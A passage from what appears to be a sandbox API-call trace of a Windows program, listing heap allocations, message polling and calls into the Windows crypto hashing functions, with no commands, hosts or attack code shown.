out: hHeap=0x970000) returned 1 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0223.520] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0223.520] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0223.520] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0223.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0223.520] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0223.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0223.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0223.521] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0223.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0223.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0223.521] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.521] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0223.521] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0223.521] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0223.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0223.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0223.521] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0223.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0223.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0223.522] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0223.522] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0223.522] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0223.522] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0223.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0223.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0223.523] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0223.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0223.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0223.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0223.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0223.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0223.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0223.524] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0223.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.524] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0223.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0223.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0223.524] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0223.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0223.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.524] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0223.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0223.525] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0223.525] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0223.525] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0223.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0223.525] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0223.525] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0223.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0223.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0223.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0223.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0223.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0223.525] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0223.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0223.525] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0223.525] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0223.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0223.526] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0223.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0223.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0223.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0223.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0223.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0223.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e513d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0223.526] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0223.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0223.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0223.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0223.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0223.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0223.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0223.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0223.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0223.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0223.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0223.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0223.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0223.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0223.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0223.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0223.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0223.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0223.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0223.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0223.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0223.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0223.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0223.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0223.529] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0223.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0223.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0223.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0223.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0223.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0223.530] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0223.530] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, 